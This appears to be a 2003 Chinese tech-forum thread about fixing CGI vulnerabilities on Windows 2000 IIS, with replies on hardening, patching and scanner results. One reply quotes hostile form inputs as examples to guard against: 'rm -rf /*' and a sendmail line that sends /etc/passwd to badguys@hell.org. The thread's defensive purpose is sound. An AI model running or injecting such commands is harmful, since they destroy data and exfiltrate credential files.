社区
安全技术/病毒
帖子详情
如何解决2K的web cgi漏洞?
yishao
2003-07-06 07:42:37
打什么补丁?在哪里可以下载?
...全文
145
23
打赏
收藏
如何解决2K的web cgi漏洞?
打什么补丁?在哪里可以下载?
复制链接
扫一扫
分享
转发到动态
举报
写回复
配置赞助广告
用AI写文章
23 条
回复
切换为时间正序
请发表友善的回复…
发表回复
打赏红包
jonason6
2004-01-30
打赏
举报
回复
呵呵
WEB8888
2003-08-03
打赏
举报
回复
接分嘻嘻!
yishao
2003-08-03
打赏
举报
回复
现在好了,通过4天4夜的奋战,终于解决了问题(自己解决的)
解决方法:通过合理的设置IIS(不需要打补丁)就可以得到解决。如果有人愿意用高分知道解决的方法的话发短讯给我,或者QQ:3381387.
由于问题是我自己解决的,所以我就自私点把分转到我同学那里。请大家不要怪哦!
kenkrizzard
2003-08-02
打赏
举报
回复
干嘛这么麻烦呢?并不是每一个漏洞都那么致命.只要你及时升级补丁,是不会有什么危险的.http://www.microsoft.com/china/index.htm上补丁一大堆,要什么下载什么,微软的补丁不是吃素的.
kenkrizzard
2003-08-02
打赏
举报
回复
超级补丁兄的建议真是惊天地,泣鬼神!!真为此兄的手腕和键盘痛惜不已!!
只是,这么长的篇幅会杀人的!这不,我看着看着就口吐白沫,吐血三碗.
二进制空间安全
2003-08-01
打赏
举报
回复
从现在开始,按照要求一步一步去实行!多利用时间写写CGI程序!
二进制空间安全
2003-08-01
打赏
举报
回复
从现在开始,按照要求一步一步去实行!多利用时间写写CGI程序!
yishao
2003-08-01
打赏
举报
回复
如何解决以上9条问题?
二进制空间安全
2003-08-01
打赏
举报
回复
给楼主一个整体建议吧:
1,使用最新版本的Web服务器,安装最新的补丁程序,正确配置服务器。
2,按照帮助文件正确安装CGI程序,删除不必要的安装文件和临时文件。
3,使用C编写CGI程序时,使用安全的函数。
4,使用安全有效的验证用户身份的方法。
5,验证用户的来源,防止用户短时间内过多动作。
6,推荐过滤“& ; ` \ ”| * ? ~ < > ^ () [] {} $ \n \r \t \0 # .../”。
7,注意处理好意外情况。
8,实现功能时制定安全合理的策略。
9,培养良好的编程习惯。
10,科学严谨的治学态度,避免“想当然”的错误。
以上建议包括了编程时应注意的问题,当然这样可以更好的避免CGI漏洞的产生。
注:以上都是前辈的意见和建议!
yishao
2003-08-01
打赏
举报
回复
UP!
reddante
2003-08-01
打赏
举报
回复
把cgi错误提示全改了就比较安全了。
还有cgi本来就是提供用户交流的所以攻击方法也很多,升升级要,改下设置什么的一办就可以了。那应为你没法更改协议等基本的东西,而且windows原代也不提供,修改不了内核。
轻快一点就什么都有了 。
yishao
2003-08-01
打赏
举报
回复
系统的
reddante
2003-08-01
打赏
举报
回复
~~~~~~~~~~~~~
system(), exec(), open(),eval()等exec或eval之类命令。在由用户填写的form还回cgi时,不要直接调用system()之类函数。这是为避免当填写内容为“rm -rf /*”或“/usr/lib/sendmail nobody@nowhere.com; mail badguys@hell.org< /etc/passwd”之类内容。
~~~~~~~~~~~~
你写这些干什么,人家是windows系统呀。
~~~~~
楼主你指的cgi漏洞是指比如想U漏洞那样的还是指网页上面的xss或sql injection?
yishao
2003-07-31
打赏
举报
回复
to suntiger(windows2000超级补丁)
我是问如何解决以上9条漏洞?
yishao
2003-07-30
打赏
举报
回复
to tooolder(CHolder)
我想用系统自带的IIS5.0来解决,有办法?
二进制空间安全
2003-07-30
打赏
举报
回复
安全配置IIS参考方法:
1、单独设置IIS服务器
如果可能,IIS应该安装在一个单独的服务器上。就是说,这个服务器不是任何域中的成员,不必与域控制器建立Netlogon信道,从而降低通过服务器之间连接而建立起来的空用户连接所带来的安全风险。而且,由于系统之间不传递认证通讯信息,也就降低了登录口令被截获的可能。
2、禁止不需要的服务 另外,如果仅仅是单纯的Web 服务器,那么最好禁止掉以下不需要的服务: ALERTER CLIPBOOK SERVER COMPUTER BROWSER DHCP CLIENT MESSENGER NETLOGON NETWORK DDE NET DDE DSDM NETWORK MONITOR AGENT SIMPLE TCP/IP SERVICES SPOOLER NETBIOS INTERFACE TCP/IP NETBIOS HELPER NWLINK NETBIOS
3、合理设置Web根文件夹 ,将操作系统与应用程序单独存放在不同的分区或磁盘驱动器一样,现在又要使用到隔离技术了。建议将Web根文件夹wwwroot定位在操作系统分区以外的地方甚至是另外的物理磁盘驱动器上。而且,当设置Web站点的虚拟目录或重定向文件夹时,也要保证这些目录不会被重定向到操作系统的启动分区,因为有些攻击能够危及访问文件夹所在分区上的其它文件夹。还有一种安全处理方式就是把Web根文件夹设置到另一个服务器上,使IIS服务器成为一个只缓冲请求、应答请求的系统。而且,经过这样处理后,整个服务器基本上是一个通用型的,其上没有存储任何内容,即使站点遭到攻击而瘫痪,也可以从磁带或其它备份中快速简单地恢复服务器。
4、为重要系统文件改头换面 操作系统中有许多非常重要的文件,它们就象“双刃剑”,既可以让管理员方便地执行维护工作,又可能被攻击者利用进行破坏活动。为此,建议对这些文件进行删除、重命名或者为其设置NTFS权限,目的就是使攻击者再也找不到熟悉的面孔。这些文件包括: XCOPY.EXE at.exe regedit.exe cacls.exe regedt32.exe edlin.exe rsh.exe finger.exe runas.exe ftp.exe net.exe tracert.exe netsh.exe tskill.exe poledit.exe cmd.exe regini.exe cscript.exe regsrv32.exe tftp.exe netstat.exe issync.exe runonce.exe telnet.exe debug.exe rexec.exe wscript.exe
5、删除危险的IIS组件 默认安装后的有些IIS组件可能会造成安全威胁,应该从系统中去掉,所谓“多一个组件,不如少一个组件”。以下是一些“黑名单”参考,请管理员酌情考虑:
Internet服务管理器(HTML):这是基于Web 的IIS服务器管理页面,一般情况下不应通过Web进行管理,建议卸载它。
样本页面和脚本:这些样本中有些是专门为显示IIS的强大功能设计的,但同样可被用来从Internet上执行应用程序和浏览服务器,这不是好事情,建议删除。
Win2K资源工具箱 或IIS资源工具箱:这些由专家编写的软件大概是现在最好的黑客工具了,其中有许多项目可以被攻击者利用从服务器上提取信息、进行破坏。
SMTP和NNTP:如果不打算使用服务器转发邮件和提供新闻组服务,就删除这些项目吧。否则,别因为它们的漏洞带来新的不安全。 @ Internet打印:Internet打印是Win2K中的一个新特性,它提供了通过Internet将打印作业题交给打印机的方式。但是由于网络上的打印机是通过一个Web页面进行访问并管理的,所以也就使系统增加了许多受到利用的可能。
6、改写注册表降低被攻击风险
DDoS攻击现在很流行,例如SYN使用巨量畸形TCP信息包向服务器发出请求,最终导致服务器不能正常工作。改写注册表信息虽然不能完全制止这类攻击,但是可以降低其风险,所以,建议搜索并实施相关攻击的注册表改写对策。降低SYN攻击的注册表改写对策是:将HKLM\System\CurrentControlSet\Services\Tcpip\Parameters下的SynAttackProtect的值修改为2。
7、简化IIS5中的验证方法
Win2K和IIS5紧密结合的一点就体现在它们共享了验证的功能和方法,这包括:匿名访问、基本验证(密码用明文送出)、Windows域服务器的简要验证、集成Windows验证等等。对于大多数Web站点来说,有匿名访问或基本认证就足够了,或者干脆只保留匿名访问形式。在有些地方,最简单的往往是最有效的!
8、为IIS中的文件分类设置权限
除了在操作系统级别为IIS5的文件设置必要的权限外,还要在IIS管理器中为它们设置权限,以期做到双保险。一般而言,对一个文件夹永远也不应同时设置写和执行权限,以防止攻击者向站点上传并执行恶意代码。还有目录浏览功能也应禁止,预防攻击者把站点上的文件夹浏览个遍最后找到“不忠的坏分子”。一个好的设置策略是:为Web 站点上不同类型的文件都建立目录,然后给它们分配适当权限。例如:
Scripts目录:包含站点的所有脚本文件,如cgi、vbs、asp等等,为这个文件夹设置“纯脚本”执行许可权限。
BIN目录:包含站点上的二禁止执行文件,应该为这个文件夹设置“脚本和可执行程序” 执行许可权限。
Static目录:包括所有静态文件,如HTM 或HTML,为这个文件夹设置“读权限”
9、全力保护IIS
metabase IIS Metabase保存着包括口令在内的几乎IIS配置各个方面的内容,而且这些信息都以明文形式存储,因此保护它至关重要。建议采取如下措施:
把HTTP和FTP根文件夹从%systemroot%下移走
慎重考虑重新命名Metabase和移动Metabase位置
安全设置确定Metabase位置的注册表关键字
审核所有试图访问并编辑Metabase的失败日志
删除文件%systemroot%\system32\inetserv\Iissync.exe
为Metabase文件设置以下权限:Administrators/完全控制,System/完全控制完成IIS配置后对Metabase 进行备份,这时会创建文件夹%systemroot%\system32\inetserv\MetaBack,备份文件就存储在其中。对于这个地方,要采取如下措施进行保护:
审核对\MetaBack文件夹的所有失败访问尝试
为\MetaBack文件夹设置如下权限:Administrators/完全控制,System/完全控制最后,要保护能够编辑Metabase的工具,步骤是:
移走文件夹\Inetpub\Adminscripts,这里包含着IIS的所有管理脚本
将"\program file"文件下的Metaedit.exe 和Metautil.dll移到%systemroot%\system32\Inetserv文件夹下,并调整相应的开始菜单快捷方式。
审核对\Adminscripts文件夹的所有失败访问尝试
对执行.VBS文件的%systemroot%\system32\csript.exe设置权限为“Administrators/完全控制”。
对\Adminscripts文件夹设置权限“Administrators/完全控制”。
不要在服务器上面安装FRONPAGE等系列的软件。。。这样也可能是黑客的入侵口!
关掉自己不需要的服务和映射...[建议最好把不用的映射DEL掉] 还有就是注意建立审核例行程序和备份策略和数据保护对存储在服务器上暴露于Internet的数据进行保护也很重要。除了设置相应权限外,建立一个正式的备份策略,定期进行磁带备份非常必要的。对于以上两点都需要明确目标。可以把备份分两份。1备份在SERVER外“光盘。磁带。或者局域网中的其他COMPUTER硬盘中。 2备份在SERVER其他盘中,把权限设置为adminstrators。
感谢各位
2003-07-29
打赏
举报
回复
1、TwwwScan扫描器是一款专门扫描WWW服务的扫描器,它扫描的漏洞较多,而且可以扫描Windows和Unix系统漏洞。仔细阅读扫描结果,我们不但可以看到系统漏洞,同时也会看到解决方法。
2、微软的IIS服务器由于功能设置太多,即使是对专业用户来说,要把它配置的天衣无缝也是十分困难的。大多数针对这一系统的攻击并不是由于IIS软件本身的漏洞,而是对他的备至不够完备。为解决这一问题,微软近日又推出了IIS功能锁定程序IIS Lockdown Wizard 2.1版。应用这一软件,可以在想到的帮助下对系统中不用的功能进行关闭,为系统提供多层保护。通过它可以帮助用户堵住各种一致的漏洞和不恰当配置,令黑客没有可乘之机。
yishao
2003-07-29
打赏
举报
回复
惨!
用twwwscan扫描还是有如下漏洞,如何补?
IIS Path Reveal(anything.idq)
/test.idq
IIS Path Reveal
IIS Path Reveal(anything.ida)
/test.ida
IIS Path Reveal
Malform Hit-Highlighting(qfullhit.htw)
CVE-2000-0097
MS00-006.asp
Index Server Security Hole(null.htw)
CVE-2000-0097
MS00-006.asp
FrontPage 2k <=1.1 Path vul
/_vti_bin/shtml.dll/nosuch.htm
CAN-2000-0413
solution:vendor homepage
FrontPage 2k,IIS Multiple (shtml.dll)
/_vti_bin/shtml.dll
good reading Cross-site Scripting Overview
solution:vendor homepage
Frontpage97 fpcount bof(fpcount.exe)
/_vti_bin/fpcount.exe
solution:delete fpcount.exe
FrontPage MS-DOS Device DoS(shtml.exe)
/_vti_bin/shtml.exe
vendor homepage
Indexing service for win2k .htw
solution:MS00-084
yishao
2003-07-12
打赏
举报
回复
??
yishao
2003-07-10
打赏
举报
回复
我已经打了sp4补丁了但是都是无用用扫描软件扫了还是有CGI漏洞(很多谢你那快给我答复,请问是不是都在线的?)
加载更多回复(3)
[渗透测试笔记] 56.日薪
2k
的蓝队hw中级定级必备笔记系列篇4之面试必备
web
中间件
漏洞
汇总
IIS6.0,asp目录下的任意文件当作asp解析 IIS6.0,默认解析asa、cdx、cer IIS7.0-7.5,a.png/a.php当作php代码解析,需要fast-
cgi
开启 5.Tomcat 默认端口8080 5.1任意文件写入
漏洞
(CVE-2017-12615) conf/
web
.xml中...
upload
漏洞
专题
4.)如果
web
服务器配置了ssi,可尝试SHTML,SHT等文件命令执行 黑名单特殊绕过的原理分析 windows特性绕过 #如 ①如果在代码中没有过滤掉空格类时,可以利用windows的特性php(空格)进行绕过-->即该类名字最后会被直接...
记一次超骚的SRC
漏洞
挖掘思路
在这家SRC
漏洞
挖掘过程中,真的防得比较死。这次的操作是通过阅读微信小程序开发文档,终于找到的突破口。目前未看见有这个
漏洞
的分享,今天分享出来觉得好的话点个关注吧!
web
渗透测试
渗透测试
web
笔记
WEB
安全性测试测试用例(基础).doc
建立整体的威胁模型,测试溢出
漏洞
、信息泄漏、错误处理、SQL注入、身份验证和授权错误. 1. 输入验证 客户端验证服务器端验证(禁用脚本调试,禁用Cookies) 1.输入很大的数(如4,294,967,269)...
安全技术/病毒
9,506
社区成员
28,984
社区内容
发帖
与我相关
我的任务
安全技术/病毒
Windows专区 安全技术/病毒
复制链接
扫一扫
分享
社区描述
Windows专区 安全技术/病毒
社区管理员
加入社区
获取链接或二维码
近7日
近30日
至今
加载中
查看更多榜单
社区公告
暂无公告
试试用AI创作助手写篇文章吧
+ 用AI写文章